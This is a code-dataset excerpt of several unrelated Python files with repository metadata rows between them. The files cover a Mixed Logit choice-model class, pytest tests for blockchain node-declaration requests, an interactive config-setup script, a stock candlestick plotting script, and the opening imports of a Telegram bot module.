             data,
             alt_id_col,
             obs_id_col,
             choice_col,
             specification,
             names=None,
             mixing_id_col=None,
             mixing_vars=None,
             *args, **kwargs):
    """Instantiate the Mixed Logit model.

    See the class docstring for parameter descriptions. Shape-related
    keyword arguments are ignored (with a warning) because the Mixed MNL
    kernel has no shape parameters, and `intercept_ref_pos` must be None
    because all Mixed Logit intercepts belong in the index.
    """
    ##########
    # Print a helpful message for users who have included shape parameters
    # or shape names unnecessarily
    ##########
    for keyword in ["shape_names", "shape_ref_pos"]:
        if keyword in kwargs and kwargs[keyword] is not None:
            warnings.warn(_shape_ignore_msg)
            break

    if "intercept_ref_pos" in kwargs:
        if kwargs["intercept_ref_pos"] is not None:
            msg = "All Mixed Logit intercepts should be in the index. "
            msg_2 = "intercept_ref_pos should be None."
            raise ValueError(msg + msg_2)

    # Carry out the common instantiation process for all choice models
    model_name = model_type_to_display_name["Mixed Logit"]
    super(MixedLogit, self).__init__(data,
                                     alt_id_col,
                                     obs_id_col,
                                     choice_col,
                                     specification,
                                     names=names,
                                     model_type=model_name,
                                     mixing_id_col=mixing_id_col,
                                     mixing_vars=mixing_vars)

    # Store the utility transform function
    self.utility_transform = mnl_utility_transform

    return None
def fit_mle(self,
            init_vals,
            num_draws,
            seed=None,
            constrained_pos=None,
            print_res=True,
            method="BFGS",
            loss_tol=1e-06,
            gradient_tol=1e-06,
            maxiter=1000,
            ridge=None,
            just_point=False,
            **kwargs):
    """
    Estimate the model parameters by maximum simulated likelihood.

    Parameters
    ----------
    init_vals : 1D ndarray.
        Should contain the initial values to start the optimization process
        with. There should be one value for each utility coefficient and
        shape parameter being estimated.
    num_draws : int.
        Should be greater than zero. Denotes the number of draws that we
        are making from each normal distribution.
    seed : int or None, optional.
        If an int is passed, it should be greater than zero. Denotes the
        value to be used in seeding the random generator used to generate
        the draws from the normal distribution. Default == None.
    constrained_pos : list or None, optional.
        Denotes the positions of the array of estimated parameters that are
        not to change from their initial values. If a list is passed, the
        elements are to be integers where no such integer is greater than
        `init_values.size.` Default == None.
    print_res : bool, optional.
        Determines whether the timing and initial and final log likelihood
        results will be printed as they are determined.
    method : str, optional.
        Should be a valid string which can be passed to
        scipy.optimize.minimize. Determines the optimization algorithm
        that is used for this problem.
    loss_tol : float, optional.
        Determines the tolerance on the difference in objective function
        values from one iteration to the next which is needed to determine
        convergence. Default = 1e-06.
    gradient_tol : float, optional.
        Determines the tolerance on the difference in gradient values from
        one iteration to the next which is needed to determine convergence.
        Default = 1e-06.
    maxiter : int, optional.
        Denotes the maximum number of iterations of the algorithm specified
        by `method` that will be used to estimate the parameters of the
        given model. Default == 1000.
    ridge : int, float, long, or None, optional.
        Determines whether or not ridge regression is performed. If a float
        is passed, then that float determines the ridge penalty for the
        optimization. Default = None.
    just_point : bool, optional.
        Determines whether (True) or not (False) calculations that are non-
        critical for obtaining the maximum likelihood point estimate will
        be performed. If True, this function will return the results
        dictionary from scipy.optimize. Default == False.

    Returns
    -------
    None. Estimation results are saved to the model instance.
    """
    # Check integrity of passed arguments
    kwargs_to_be_ignored = ["init_shapes", "init_intercepts", "init_coefs"]
    if any([x in kwargs for x in kwargs_to_be_ignored]):
        msg = "MNL model does not use of any of the following kwargs:\n{}"
        msg_2 = "Remove such kwargs and pass a single init_vals argument"
        raise ValueError(msg.format(kwargs_to_be_ignored) + msg_2)

    # Store the optimization method
    self.optimization_method = method

    # Store the ridge parameter; warn because the reported standard errors
    # are incorrect under an L2 penalty.
    self.ridge_param = ridge
    if ridge is not None:
        warnings.warn(_ridge_warning_msg)

    # Construct the mappings from alternatives to observations and from
    # chosen alternatives to observations
    mapping_res = self.get_mappings_for_fit()
    rows_to_mixers = mapping_res["rows_to_mixers"]

    # Get the draws for each random coefficient: one set of draws per
    # mixing unit per mixing variable.
    num_mixing_units = rows_to_mixers.shape[1]
    draw_list = mlc.get_normal_draws(num_mixing_units,
                                     num_draws,
                                     len(self.mixing_pos),
                                     seed=seed)

    # Create the 3D design matrix (design expanded across the draws)
    self.design_3d = mlc.create_expanded_design_for_mixing(self.design,
                                                           draw_list,
                                                           self.mixing_pos,
                                                           rows_to_mixers)

    # Create the estimation object
    zero_vector = np.zeros(init_vals.shape)
    mixl_estimator = MixedEstimator(self,
                                    mapping_res,
                                    ridge,
                                    zero_vector,
                                    split_param_vec,
                                    constrained_pos=constrained_pos)

    # Perform one final check on the length of the initial values
    mixl_estimator.check_length_of_initial_values(init_vals)

    # Get the estimation results
    estimation_res = estimate(init_vals,
                              mixl_estimator,
                              method,
                              loss_tol,
                              gradient_tol,
                              maxiter,
                              print_res,
                              use_hessian=True,
                              just_point=just_point)

    if not just_point:
        # Store the mixed logit specific estimation results
        args = [mixl_estimator, estimation_res]
        estimation_res = add_mixl_specific_results_to_estimation_res(*args)

        # Store the estimation results
        self.store_fit_results(estimation_res)

        return None
    else:
        return estimation_res
def __filter_past_mappings(self,
                           past_mappings,
                           long_inclusion_array):
    """
    Filter each mapping matrix down to the rows marked for inclusion.

    Parameters
    ----------
    past_mappings : dict.
        All elements should be None or compressed sparse row matrices from
        scipy.sparse. The following keys should be in past_mappings:

          - "rows_to_obs",
          - "rows_to_alts",
          - "chosen_rows_to_obs",
          - "rows_to_nests",
          - "rows_to_mixers"

        The values that are not None should be 'mapping' matrices that
        denote which rows of the past long-format design matrix belong to
        which unique object such as unique observations, unique
        alternatives, unique nests, unique 'mixing' units etc.
    long_inclusion_array : 1D ndarray.
        Should denote, via a `1`, the rows of the past mapping matrices
        that are to be included in the filtered mapping matrices.

    Returns
    -------
    new_mappings : dict.
        The returned dictionary will be the same as `past_mappings` except
        that all the mapping matrices will have been filtered according to
        `long_inclusion_array`.
    """
    new_mappings = {}
    for key in past_mappings:
        if past_mappings[key] is None:
            new_mappings[key] = None
        else:
            mask_array = long_inclusion_array[:, None]
            orig_map = past_mappings[key]
            # Initialize the resultant array that is desired: zero out the
            # excluded rows, densify (.A) for boolean row/column filtering.
            new_map = orig_map.multiply(np.tile(mask_array,
                                                (1, orig_map.shape[1]))).A
            # Perform the desired filtering: drop all-zero rows.
            current_filter = (new_map.sum(axis=1) != 0)
            if current_filter.shape[0] > 0:
                current_filter = current_filter.ravel()
                new_map = new_map[current_filter, :]

            # Do the second filtering: drop all-zero columns.
            current_filter = (new_map.sum(axis=0) != 0)
            if current_filter.shape[0] > 0:
                current_filter = current_filter.ravel()
                new_map = new_map[:, current_filter]

            # Store back as a sparse matrix, matching the input format.
            new_mappings[key] = csr_matrix(new_map)

    return new_mappings
    def panel_predict(self,
                      data,
                      num_draws,
                      return_long_probs=True,
                      choice_col=None,
                      seed=None):
        """
        Predict choice probabilities for panel data, using 'individualized'
        coefficient distributions for individuals that were also present in
        the estimation dataset.

        Parameters
        ----------
        data : string or pandas dataframe.
            If string, data should be an absolute or relative path to a CSV
            file containing the long format data to be predicted with this
            choice model. Note long format has one row per available
            alternative for each observation. If pandas dataframe, the
            dataframe should be in long format.
        num_draws : int.
            Should be greater than zero. Denotes the number of draws being
            made from each mixing distribution for the random coefficients.
        return_long_probs : bool, optional.
            Indicates whether or not the long format probabilites (a 1D numpy
            array with one element per observation per available alternative)
            should be returned. Default == True.
        choice_col : str or None, optional.
            Denotes the column in long_form which contains a one if the
            alternative pertaining to the given row was the observed outcome
            for the observation pertaining to the given row and a zero
            otherwise. If passed, then an array of probabilities of just the
            chosen alternative for each observation will be returned.
            Default == None.
        seed : int or None, optional.
            If an int is passed, it should be greater than zero. Denotes the
            value to be used in seeding the random generator used to generate
            the draws from the mixing distributions of each random coefficient.
            Default == None.

        Returns
        -------
        numpy array or tuple of two numpy arrays.
            - If `choice_col` is passed AND `return_long_probs` is True, then
              the tuple `(chosen_probs, pred_probs_long)` is returned.
            - If `return_long_probs` is True and `choice_col` is None, then
              only `pred_probs_long` is returned.
            - If `choice_col` is passed and `return_long_probs` is False then
              `chosen_probs` is returned.

            `chosen_probs` is a 1D numpy array of shape (num_observations,).
            Each element is the probability of the corresponding observation
            being associated with its realized outcome.

            `pred_probs_long` is a 1D numpy array with one element per
            observation per available alternative for that observation. Each
            element is the probability of the corresponding observation being
            associated with that row's corresponding alternative.

        Raises
        ------
        ValueError
            If both `choice_col` is None and `return_long_probs` is False, or
            if a required id column is missing from `data`.

        Notes
        -----
        It is NOT valid to have `choice_col == None` and
        `return_long_probs == False`.
        """
        # Ensure that the function arguments are valid
        if choice_col is None and not return_long_probs:
            msg = "choice_col is None AND return_long_probs == False"
            raise ValueError(msg)
        # Get the dataframe of observations we'll be predicting on
        dataframe = get_dataframe_from_data(data)
        # Determine the conditions under which we will add an intercept column
        # to our long format dataframe.
        condition_1 = "intercept" in self.specification
        condition_2 = "intercept" not in dataframe.columns
        if condition_1 and condition_2:
            dataframe["intercept"] = 1.0
        # Make sure the necessary columns are in the long format dataframe
        for column in [self.alt_id_col,
                       self.obs_id_col,
                       self.mixing_id_col]:
            if column is not None and column not in dataframe.columns:
                msg = "{} not in data.columns".format(column)
                raise ValueError(msg)
        # Get the new column of alternative IDs and get the new design matrix
        new_alt_IDs = dataframe[self.alt_id_col].values
        new_design_res = create_design_matrix(dataframe,
                                              self.specification,
                                              self.alt_id_col,
                                              names=self.name_spec)
        new_design_2d = new_design_res[0]
        # Get the new mappings between the alternatives and observations
        mapping_res = create_long_form_mappings(dataframe,
                                                self.obs_id_col,
                                                self.alt_id_col,
                                                choice_col=choice_col,
                                                nest_spec=self.nest_spec,
                                                mix_id_col=self.mixing_id_col)
        new_rows_to_obs = mapping_res["rows_to_obs"]
        new_rows_to_alts = mapping_res["rows_to_alts"]
        new_chosen_to_obs = mapping_res["chosen_row_to_obs"]
        new_rows_to_mixers = mapping_res["rows_to_mixers"]
        # Determine the coefficients being used for prediction.
        # Note that I am making an implicit assumption (for now) that the
        # kernel probabilities are coming from a logit-type model.
        new_index_coefs = self.coefs.values
        new_intercepts = (self.intercepts.values if self.intercepts
                          is not None else None)
        new_shape_params = (self.shapes.values if self.shapes
                            is not None else None)
        # Get the draws for each random coefficient
        num_mixing_units = new_rows_to_mixers.shape[1]
        draw_list = mlc.get_normal_draws(num_mixing_units,
                                         num_draws,
                                         len(self.mixing_pos),
                                         seed=seed)
        # Calculate the 3D design matrix for the prediction.
        design_args = (new_design_2d,
                       draw_list,
                       self.mixing_pos,
                       new_rows_to_mixers)
        new_design_3d = mlc.create_expanded_design_for_mixing(*design_args)
        # Calculate the desired probabilities for the mixed logit model.
        prob_args = (new_index_coefs,
                     new_design_3d,
                     new_alt_IDs,
                     new_rows_to_obs,
                     new_rows_to_alts,
                     mnl_utility_transform)
        prob_kwargs = {"intercept_params": new_intercepts,
                       "shape_params": new_shape_params,
                       "return_long_probs": True}
        # Note that I am making an implicit assumption (for now) that the
        # kernel probabilities are coming from a logit-type model.
        new_kernel_probs = general_calc_probabilities(*prob_args,
                                                      **prob_kwargs)
        # Initialize and calculate the weights needed for prediction with
        # "individualized" coefficient distributions. Should have shape
        # (new_row_to_mixer.shape[1], num_draws). Starts uniform (1/num_draws)
        # and is later overwritten for individuals seen during estimation.
        weights_per_ind_per_draw = (1.0 / num_draws *
                                    np.ones((new_rows_to_mixers.shape[1],
                                             num_draws)))
        ##########
        # Create an array denoting the observation ids that are present in both
        # the dataset to be predicted and the dataset used for model estimation
        ##########
        # Get the old mixing ids
        old_mixing_id_long = self.data[self.mixing_id_col].values
        # Get the new mixing ids
        new_mixing_id_long = dataframe[self.mixing_id_col].values
        # Get the unique individual ids from the original and preserve order
        orig_unique_id_idx_old = np.sort(np.unique(old_mixing_id_long,
                                                   return_index=True)[1])
        orig_unique_id_idx_new = np.sort(np.unique(new_mixing_id_long,
                                                   return_index=True)[1])
        # Get the unique ids, in their original order of appearance
        orig_order_unique_ids_old = old_mixing_id_long[orig_unique_id_idx_old]
        orig_order_unique_ids_new = new_mixing_id_long[orig_unique_id_idx_new]
        # Figure out which long format rows have ids that are common to both
        # datasets
        old_repeat_mixing_id_idx = np.in1d(old_mixing_id_long,
                                           orig_order_unique_ids_new)
        # Figure out which unique ids are in both datasets
        old_unique_mix_id_repeats = np.in1d(orig_order_unique_ids_old,
                                            orig_order_unique_ids_new)
        new_unique_mix_id_repeats = np.in1d(orig_order_unique_ids_new,
                                            orig_order_unique_ids_old)
        # Get the 2d design matrix used to estimate the model, and filter it
        # to only those individuals for whom we are predicting new choice
        # situations.
        past_design_2d = self.design[old_repeat_mixing_id_idx, :]
        ##########
        # Appropriately filter the old mapping matrix that maps rows of the
        # long format design matrix to unique mixing units.
        ##########
        orig_mappings = self.get_mappings_for_fit()
        past_mappings = self.__filter_past_mappings(orig_mappings,
                                                    old_repeat_mixing_id_idx)
        # Create the 3D design matrix for those choice situations, using the
        # draws that were just taken from the mixing distributions of interest.
        past_draw_list = [x[new_unique_mix_id_repeats, :] for x in draw_list]
        design_args = (past_design_2d,
                       past_draw_list,
                       self.mixing_pos,
                       past_mappings["rows_to_mixers"])
        past_design_3d = mlc.create_expanded_design_for_mixing(*design_args)
        # Get the kernel probabilities of each of the alternatives for
        # each of the previous choice situations, given the current draws
        # of the random coefficients
        prob_args = (new_index_coefs,
                     past_design_3d,
                     self.alt_IDs[old_repeat_mixing_id_idx],
                     past_mappings["rows_to_obs"],
                     past_mappings["rows_to_alts"],
                     mnl_utility_transform)
        prob_kwargs = {"return_long_probs": True}
        past_kernel_probs = mlc.general_calc_probabilities(*prob_args,
                                                           **prob_kwargs)
        ##########
        # Calculate the old sequence probabilities of all the individuals
        # for whom we have recorded observations and for whom we are predicting
        # future choice situations
        ##########
        past_choices = self.choices[old_repeat_mixing_id_idx]
        sequence_args = (past_kernel_probs,
                         past_choices,
                         past_mappings["rows_to_mixers"])
        seq_kwargs = {"return_type": 'all'}
        old_sequence_results = mlc.calc_choice_sequence_probs(*sequence_args,
                                                              **seq_kwargs)
        # Note sequence_probs_per_draw should have shape
        # (num repeated individuals, num_draws)
        past_sequence_probs_per_draw = old_sequence_results[1]
        # Calculate the weights for each individual who has repeat observations
        # in the previously observed dataset. Each individual's weights are
        # normalized so they sum to one across draws.
        past_weights = (past_sequence_probs_per_draw /
                        past_sequence_probs_per_draw.sum(axis=1)[:, None])
        # Rearrange the past weights to match the current ordering of the
        # unique observations, via a sparse permutation-like matrix built from
        # the id-equality outer comparison.
        rel_new_ids = orig_order_unique_ids_new[new_unique_mix_id_repeats]
        num_rel_new_id = rel_new_ids.shape[0]
        new_unique_mix_id_repeats_2d = rel_new_ids.reshape((num_rel_new_id, 1))
        rel_old_ids = orig_order_unique_ids_old[old_unique_mix_id_repeats]
        num_rel_old_id = rel_old_ids.shape[0]
        old_unique_mix_id_repeats_2d = rel_old_ids.reshape((1, num_rel_old_id))
        new_to_old_repeat_ids = csr_matrix(new_unique_mix_id_repeats_2d ==
                                           old_unique_mix_id_repeats_2d)
        past_weights = new_to_old_repeat_ids.dot(past_weights)
        # Map these weights to earlier initialized weights
        weights_per_ind_per_draw[new_unique_mix_id_repeats, :] = past_weights
        # Create a 'long' format version of the weights array. This version
        # should have the same number of rows as the new kernel probs but the
        # same number of columns as the weights array (aka the number of draws)
        weights_per_draw = new_rows_to_mixers.dot(weights_per_ind_per_draw)
        # Calculate the predicted probabilities of each alternative for each
        # choice situation being predicted (weighted average over draws).
        pred_probs_long = (weights_per_draw * new_kernel_probs).sum(axis=1)
        # Note I am assuming pred_probs_long should be 1D (as should be the
        # case if we are predicting with one set of betas and one 2D data
        # object)
        pred_probs_long = pred_probs_long.ravel()
        # Format the returned objects according to the user's desires.
        if new_chosen_to_obs is None:
            chosen_probs = None
        else:
            # chosen_probs will be of shape (num_observations,)
            chosen_probs = new_chosen_to_obs.transpose().dot(pred_probs_long)
            if len(chosen_probs.shape) > 1 and chosen_probs.shape[1] > 1:
                # Multiple columns: leave the 2D result untouched.
                pass
            else:
                chosen_probs = chosen_probs.ravel()
        # Return the long form and chosen probabilities if desired
        if return_long_probs and chosen_probs is not None:
            return chosen_probs, pred_probs_long
        # If working with predictions, return just the long form probabilities
        elif return_long_probs and chosen_probs is None:
            return pred_probs_long
        # If estimating the model and storing fitted probabilities or
        # testing the model on data for which we know the chosen alternative,
        # just return the chosen probabilities.
        elif chosen_probs is not None:
            return chosen_probs
| 44.979167 | 79 | 0.612297 | 5,293 | 43,180 | 4.788022 | 0.118458 | 0.009707 | 0.008523 | 0.007103 | 0.360178 | 0.283905 | 0.261571 | 0.225861 | 0.206092 | 0.194847 | 0 | 0.005837 | 0.333488 | 43,180 | 959 | 80 | 45.026069 | 0.874739 | 0.482145 | 0 | 0.28836 | 0 | 0 | 0.050646 | 0.002343 | 0 | 0 | 0 | 0 | 0 | 1 | 0.042328 | false | 0.007937 | 0.034392 | 0 | 0.134921 | 0.005291 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
4174d02ae022627c9a3fdf728ab8801e521bd891 | 7,836 | py | Python | node/blockchain/tests/test_models/test_signed_change_request/test_node_declaration.py | thenewboston-developers/Node | e71a405f4867786a54dd17ddd97595dd3a630018 | [
"MIT"
] | 18 | 2021-11-30T04:02:13.000Z | 2022-03-24T12:33:57.000Z | node/blockchain/tests/test_models/test_signed_change_request/test_node_declaration.py | thenewboston-developers/Node | e71a405f4867786a54dd17ddd97595dd3a630018 | [
"MIT"
] | 1 | 2022-02-04T17:07:38.000Z | 2022-02-04T17:07:38.000Z | node/blockchain/tests/test_models/test_signed_change_request/test_node_declaration.py | thenewboston-developers/Node | e71a405f4867786a54dd17ddd97595dd3a630018 | [
"MIT"
] | 5 | 2022-01-31T05:28:13.000Z | 2022-03-08T17:25:31.000Z | import json
import re
import pytest
from pydantic import ValidationError
from node.blockchain.inner_models import (
NodeDeclarationSignedChangeRequest, NodeDeclarationSignedChangeRequestMessage, SignedChangeRequest
)
from node.blockchain.mixins.crypto import HashableStringWrapper
from node.blockchain.tests.test_models.base import CREATE, VALID, node_declaration_message_type_validation_parametrizer
def test_create_from_node_declaration_signed_change_request_message(
    node_declaration_signed_change_request_message, regular_node_key_pair
):
    """The factory method builds a correctly typed and signed request."""
    request = SignedChangeRequest.create_from_signed_change_request_message(
        message=node_declaration_signed_change_request_message,
        signing_key=regular_node_key_pair.private,
    )
    expected_signature = (
        'e6f950cce5fbe79ebc58dbd317ba7dec5baf6387bfeeb4656d73c8790d2564a4'
        '44f8c702b3e3ca931b5bb6e534781a135d5c17c4ff03886a80f32643dbd8fe0d'
    )
    assert isinstance(request, NodeDeclarationSignedChangeRequest)
    assert request.signer == regular_node_key_pair.public
    assert request.signature == expected_signature
    assert request.message == node_declaration_signed_change_request_message
def test_serialize_and_deserialize_node_declaration(
    regular_node_declaration_signed_change_request, regular_node_key_pair
):
    """A request survives a JSON round trip unchanged and re-serializes stably."""
    original = regular_node_declaration_signed_change_request
    assert isinstance(original, NodeDeclarationSignedChangeRequest)

    first_json = original.json()
    restored = SignedChangeRequest.parse_raw(first_json)

    assert isinstance(restored, NodeDeclarationSignedChangeRequest)
    assert restored.signer == original.signer
    assert restored.signature == original.signature
    assert restored.message == original.message
    assert restored == original
    # Serializing the restored object must reproduce the same JSON.
    assert restored.json() == first_json
def test_node_does_not_serialize_identifier(regular_node_declaration_signed_change_request, regular_node_key_pair):
    """The node identifier must be excluded from both dict and JSON output."""
    request = regular_node_declaration_signed_change_request
    assert isinstance(request, NodeDeclarationSignedChangeRequest)
    assert 'identifier' not in request.dict()['message']['node']
    assert 'identifier' not in json.loads(request.json())['message']['node']
def test_signature_validation_node_declaration(
    node_declaration_signed_change_request_message, primary_validator_key_pair
):
    """Tampering with signer, signature, or message must fail validation."""
    template = NodeDeclarationSignedChangeRequest.create_from_signed_change_request_message(
        message=node_declaration_signed_change_request_message,
        signing_key=primary_validator_key_pair.private,
    )

    def assert_invalid_signature(signer, signature, message):
        with pytest.raises(ValidationError) as exc_info:
            NodeDeclarationSignedChangeRequest(
                signer=signer,
                signature=signature,
                message=message,
            )
        assert re.search(r'__root__.*Invalid signature', str(exc_info.value), flags=re.DOTALL)

    # A zeroed-out signature does not match the message.
    assert_invalid_signature(template.signer, '0' * 128, template.message)
    # A zeroed-out signer cannot have produced the signature.
    assert_invalid_signature('0' * 64, template.signature, template.message)
    # A message altered after signing (different account lock) must fail too.
    tampered_message = NodeDeclarationSignedChangeRequestMessage(
        node=template.message.node,
        account_lock='0' * 64,
        type=template.message.type,
    )
    assert_invalid_signature(template.signer, template.signature, tampered_message)
@node_declaration_message_type_validation_parametrizer
def test_type_validation_for_node_declaration_message_on_parsing(
    id_, regular_node, node, node_identifier, node_addresses, node_fee, account_lock, search_re
):
    """Each malformed message-field combination must fail request parsing."""
    # Combinations that vary the identifier are meaningless for freshly
    # created node payloads (which carry no identifier); skip them.
    if node is CREATE and node_identifier is not VALID:
        return

    node_without_identifier = regular_node.dict()
    del node_without_identifier['identifier']

    # Build the 'node' payload according to the parametrized scenario.
    if node is VALID:
        node_payload = node_without_identifier
    elif node is CREATE:
        node_payload = {
            'addresses': regular_node.addresses if node_addresses is VALID else node_addresses,
            'fee': regular_node.fee if node_fee is VALID else node_fee,
        }
    else:
        node_payload = node

    serialized_json = json.dumps({
        'signer': '0' * 64,
        'signature': '0' * 128,
        'message': {
            'type': 1,
            'account_lock': regular_node.identifier if account_lock is VALID else account_lock,
            'node': node_payload,
        },
    })
    with pytest.raises(ValidationError) as exc_info:
        SignedChangeRequest.parse_raw(serialized_json)
    assert re.search(search_re, str(exc_info.value), flags=re.DOTALL)
@pytest.mark.parametrize(
    'id_, signer, signature, type_, search_re',
    (
        # signer
        (1, None, '0' * 128, 1, r'signer.*none is not an allowed value'),
        (2, 1, '0' * 128, 1, r'signer.*str type expected'),
        (3, '', '0' * 128, 1, r'signer.*ensure this value has at least 64 characters'),
        (4, 'ab', '0' * 128, 1, r'signer.*ensure this value has at least 64 characters'),

        # signature
        (5, '0' * 64, None, 1, r'signature.*none is not an allowed value'),
        (6, '0' * 64, 1, 1, r'signature.*str type expected'),
        (7, '0' * 64, '', 1, r'signature.*ensure this value has at least 128 characters'),
        (8, '0' * 64, 'ab', 1, r'signature.*ensure this value has at least 128 characters'),

        # type_
        (9, '0' * 64, '0' * 128, None, r'type.*none is not an allowed value'),
        (10, '0' * 64, '0' * 128, '', r'type.*value is not a valid integer'),
        (11, '0' * 64, '0' * 128, '1', r'type.*value is not a valid integer'),
        (12, '0' * 64, '0' * 128, 0, r'GenesisSignedChangeRequest.*field required'),
        (13, '0' * 64, '0' * 128, 1000, r'type.*value is not a valid enumeration member'),
        (14, '0' * 64, '0' * 128, -1, r'type.*value is not a valid enumeration member'),
    )
)
def test_type_validation_for_node_declaration_on_parsing(id_, regular_node, signer, signature, type_, search_re):
    """Malformed top-level fields must be rejected when parsing a request."""
    node_payload = {key: value for key, value in regular_node.dict().items() if key != 'identifier'}
    payload = json.dumps({
        'signer': signer,
        'signature': signature,
        'message': {
            'type': type_,
            'account_lock': regular_node.identifier,
            'node': node_payload,
        },
    })
    with pytest.raises(ValidationError) as exc_info:
        SignedChangeRequest.parse_raw(payload)
    assert re.search(search_re, str(exc_info.value), flags=re.DOTALL)
def test_hashing_does_not_include_node_identifier(regular_node_declaration_signed_change_request):
    """The request hash is computed over a dict that lacks the node identifier."""
    request = regular_node_declaration_signed_change_request
    as_dict = request.dict()
    assert 'identifier' not in as_dict['message']['node']
    # Reproduce the canonical serialization used for hashing and compare.
    canonical = json.dumps(as_dict, separators=(',', ':'), sort_keys=True)
    assert request.make_hash() == HashableStringWrapper(canonical).make_hash()
| 44.777143 | 119 | 0.727667 | 911 | 7,836 | 5.92865 | 0.149287 | 0.079985 | 0.126643 | 0.099981 | 0.591372 | 0.534716 | 0.479911 | 0.408628 | 0.381781 | 0.356786 | 0 | 0.032712 | 0.184661 | 7,836 | 174 | 120 | 45.034483 | 0.812647 | 0.006126 | 0 | 0.256944 | 0 | 0 | 0.133368 | 0.020686 | 0 | 0 | 0 | 0 | 0.145833 | 1 | 0.048611 | false | 0 | 0.048611 | 0 | 0.104167 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
41754b7be3194cb3183aea7d9f558b7b18c2dc8f | 1,742 | py | Python | CodeComb_Core/config_shell.py | amartyaamp/CodeComb | 33fd50b91edd60dd08b1f4decc35e2fcf5f1a78d | [
"MIT"
] | 1 | 2019-09-06T07:14:57.000Z | 2019-09-06T07:14:57.000Z | CodeComb_Core/config_shell.py | amartyaamp/CodeComb | 33fd50b91edd60dd08b1f4decc35e2fcf5f1a78d | [
"MIT"
] | 12 | 2019-09-10T04:07:51.000Z | 2019-12-13T03:04:49.000Z | CodeComb_Core/config_shell.py | amartyaamp/CodeComb | 33fd50b91edd60dd08b1f4decc35e2fcf5f1a78d | [
"MIT"
] | 1 | 2019-09-11T04:12:03.000Z | 2019-09-11T04:12:03.000Z | import os
from pyfiglet import figlet_format
import cutie
import configparser
## Either colorama or termcolor
# Colour support is optional. colorama enables ANSI colours on Windows
# consoles; termcolor provides the `colored` helper. Both fall back to None
# when not installed.
try:
    import colorama
    colorama.init()
except ImportError:
    colorama = None
try:
    from termcolor import colored
except ImportError:
    # NOTE(review): later code calls `colored(...)` directly; callers must
    # guard against it being None when termcolor is absent.
    colored = None
## Set the format config
def set_format():
    """Interactively choose file formats and persist them to the user config.

    Writes the chosen extensions into the FORMAT section of
    ~/codecomb_config.ini, preserving any other sections already present.
    """
    format_opts = {"C++":"cpp", "Python":"py", "C#":"cs", "Java":"java"}
    # `colored` is None when termcolor is not installed; fall back to plain text.
    prompt = 'Choose filetype (use up/down keys):'
    print(colored(prompt, 'yellow') if colored else prompt)
    format_keys = list(format_opts.keys())
    # cutie returns the indices of the selected entries.
    answers = cutie.select_multiple(format_keys)
    ## Store the config file
    config = configparser.ConfigParser()
    config_file = os.path.join(os.path.expanduser("~"), "codecomb_config.ini")
    config.read(config_file)
    config['FORMAT'] = {format_keys[ans]: format_opts[format_keys[ans]]
                        for ans in answers}
    with open(config_file, "w") as fmt_file:
        config.write(fmt_file)
## Set the Editor
def set_editor():
    """Interactively choose an editor launch command and persist it.

    Stores the selected editor's start command under EDITOR/startcmd in
    ~/codecomb_config.ini, preserving any other sections already present.
    """
    editor_opts = {"Vim":"vim ", "VSCode":"start code ",
                   "Notepad++":"Notepad++", "Sublime Text": "subl", "Atom":"atom"}
    # `colored` is None when termcolor is not installed; fall back to plain text.
    for message in ('Editor selection (should be launchable from terminal)',
                    'Choose editor (use up/down keys):'):
        print(colored(message, 'yellow') if colored else message)
    editor_keys = list(editor_opts.keys())
    # cutie returns the index of the single selected entry.
    answer = cutie.select(editor_keys, selected_index=0)
    ## Store the config file
    config = configparser.ConfigParser()
    config_file = os.path.join(os.path.expanduser("~"), "codecomb_config.ini")
    config.read(config_file)
    config['EDITOR'] = {"startcmd": editor_opts[editor_keys[answer]]}
    with open(config_file, "w") as cfg_file:
        config.write(cfg_file)
def config_shell():
    """Run the interactive configuration: file formats first, then editor."""
    set_format()
    set_editor()
if __name__ == "__main__":
    # Script entry point; strip of trailing extraction residue.
    config_shell()
41757415060bd40b7bf8385c7ab3e828141ce2df | 637 | py | Python | Candlestick-mpl_finance.py | anablima/Python-Studies | 958e181a7b9ce0569259f67f2d87d78b90cb5aa1 | [
"MIT"
] | null | null | null | Candlestick-mpl_finance.py | anablima/Python-Studies | 958e181a7b9ce0569259f67f2d87d78b90cb5aa1 | [
"MIT"
] | null | null | null | Candlestick-mpl_finance.py | anablima/Python-Studies | 958e181a7b9ce0569259f67f2d87d78b90cb5aa1 | [
"MIT"
"""Plot a weekly candlestick chart of MGLU3.SA with a 20-day moving average."""
import matplotlib.pyplot as plt
import datetime as dt
import mpl_finance as mpf
import matplotlib.dates as mdates
import pandas_datareader.data as web

# Date range of the historical price data to download from Yahoo Finance.
inicio = dt.datetime(2019, 1, 1)
fim = dt.datetime(2022, 2, 2)
df = web.DataReader('MGLU3.SA', 'yahoo', inicio, fim)

# 20-day moving average of the close (min_periods=0 fills the warm-up period).
df['med_mov'] = df['Close'].rolling(window=20, min_periods=0).mean()

# Resample daily closes into weekly OHLC bars plus total weekly volume.
df_ohlc = df['Close'].resample('7D').ohlc()
df_ohlc['Volume'] = df['Volume'].resample('7D').sum()
df_ohlc.reset_index(inplace=True)
# candlestick_ohlc expects matplotlib date numbers in the first column.
df_ohlc['Date'] = df_ohlc['Date'].map(mdates.date2num)

ax1 = plt.subplot(211)
ax1.xaxis_date()
mpf.candlestick_ohlc(ax1, df_ohlc.values, width=2, colorup='g')
ax1.plot(df.index, df['med_mov'])
# Without show() the chart never appears when this file is run as a script.
plt.show()
4177179531f58a2be53761395add53901bd1e218 | 1,901 | py | Python | components/eastereggs.py | n8wachT/BotListBot | 457160498a90c8d0a63d5a9f7400227e35431b6d | [
"MIT"
] | null | null | null | components/eastereggs.py | n8wachT/BotListBot | 457160498a90c8d0a63d5a9f7400227e35431b6d | [
"MIT"
] | null | null | null | components/eastereggs.py | n8wachT/BotListBot | 457160498a90c8d0a63d5a9f7400227e35431b6d | [
"MIT"
] | null | null | null | import random
from pprint import pprint
from peewee import fn
from model import Bot
from telegram import ReplyKeyboardMarkup
import util
from telegram import KeyboardButton
import captions
from model import track_activity
